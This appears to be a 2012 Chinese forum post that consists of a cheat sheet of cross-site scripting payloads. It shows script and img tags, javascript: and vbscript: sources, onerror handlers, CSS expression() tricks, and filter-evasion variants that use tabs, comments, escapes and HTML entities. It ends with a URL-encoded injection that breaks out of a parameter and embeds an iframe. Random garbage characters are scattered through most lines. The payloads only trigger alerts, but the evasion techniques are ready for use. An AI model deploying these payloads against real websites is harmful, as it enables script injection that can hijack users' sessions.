<script>alert("跨站")</script> (最常用); T# n \) D6 P: X- x! I$ T
<img scr=javascript:alert("跨站")></img>* }' T7 C& T U% @
<img scr="javascript: alert(/跨站/)></img>2 x" \' ` A$ h% P* m" ^
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)5 ~7 y& ~# _4 e1 Q
<img scr="#" onerror=alert(/跨站/)></img>
% z! ?/ r( N. A! S6 G<img scr="#" style="xss:expression(alert(/xss/));"></img>
# Q" d* h- n% Q9 ^4 e% m3 B$ X% R4 I8 Y<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)( b& _1 ?" q: X# l/ w; p+ h
<img src=vbscript:msgbox ("xss")></img>" k$ r1 O* z/ D. w9 ]3 d
<style> input {left:expression (alert('xss'))}</style>% A5 L( Q# q$ Q. J; Y! ]
<div style={left:expression (alert('xss'))}></div>% a% x5 }+ P2 M3 u) ^
<div style={left:exp/* */ression (alert('xss'))}></div>
6 t; a, n) ]: w2 c<div style={left:\0065\0078ression (alert('xss'))}></div>0 O9 s9 J' j T
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
) |8 O* O( Z4 ^, L5 E5 J/ }unicode <div style="{left:expRessioN (alert('xss'))}">
: R- y& i8 v. K7 q9 K& c+ G. F- e9 n- [4 w$ L3 l
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
& q0 y$ a8 Q* A( I8 f( X/ V |
发表于 2012-9-13 17:15:04
收藏
分享
支持
反对